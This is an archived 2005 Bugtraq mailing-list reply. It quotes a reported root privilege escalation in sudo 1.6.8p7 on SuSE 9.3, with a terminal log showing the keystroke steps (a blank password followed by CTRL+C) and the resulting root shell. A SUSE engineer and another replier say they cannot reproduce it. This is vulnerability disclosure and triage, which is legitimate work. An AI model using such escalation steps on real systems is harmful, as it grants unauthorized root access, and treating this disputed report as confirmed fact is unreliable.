Bugtraq mailing list archives
Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3
From: Justin <justinvinn () gmail com>
Date: Tue, 31 May 2005 15:44:45 -0400
I checked this on my RedHat Linux 9 box running sudo v 1.6.6. It didn't affect it any...

On 5/31/05, Marcus Meissner <meissner () suse de> wrote:
> On Tue, May 31, 2005 at 01:02:22PM +0700, Xnuxer Security wrote:
>> Today, 31 May 2005, I found error with root privilege escalation in Sudo version 1.6.8p7 that package installed with SuSE 9.3.
>>
>> Testing in my machine, sudo appear not check is true when I press CTRL + C with blank password and giving status SID as root privilege to SID user.
>>
>> I got successful as root without need a password but only use blank password and press CTRL + C.
>>
>> Please check my testing below in my SuSE 9.3 box:
>>
>> client@mysuse:~> cat /etc/issue
>> Welcome to SuSE Linux 9.3 (i586) - Kernel \r (\l).
>>
>> client@mysuse:~> id
>> uid=1000(client) gid=100(users) groups=16(dialout),33(video),100(users)
>> client@mysuse:~> uname -a
>> Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686 i686 i386 GNU/Linux
>> client@mysuse:~> sudo -V
>> Sudo version 1.6.8p7
>> client@mysuse:~> sudo su
>> Password: <---- fake password and press ENTER
>> Sorry, try again.
>> Password: <---- blank password and press CTRL + C
>> mysuse:/home/client #
>> mysuse:/home/client # uname -a; id; uptime
>> Linux mysuse 2.6.11.4-20a-default #1 Wed Mar 23 21:52:37 UTC 2005 i686 i686 i386 GNU/Linux
>> uid=0(root) gid=0(root) groups=0(root)
>> 12:29pm up 2:45, 3 users, load average: 0.14, 0.29, 0.45
>> mysuse:/home/client #
>>
>> Other sudo version is not check yet, about affect in other distro of linux not check too but possible vulnerable, please check it.
>>
>> SuSE Security still contacted by me.
>
> I cannot reproduce this in the default installation of sudo in SUSE Linux 9.3.
>
> Did you adapt the sudo config file in some way?
>
> What exactly do you mean with "blank password"? Empty? Or a number of spaces?
>
> Ciao, Marcus
Current thread:
- [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Xnuxer Security (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Marcus Meissner (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Todd C. Miller (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Justin (May 31)
- Re: [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Ow Mun Heng (May 31)
- Re: [security () suse de] [XNUXER-SECURITY] Root Privilige Escalation in Sudo version 1.6.8p7 without Password, SuSE 9.3 Marcus Meissner (May 31)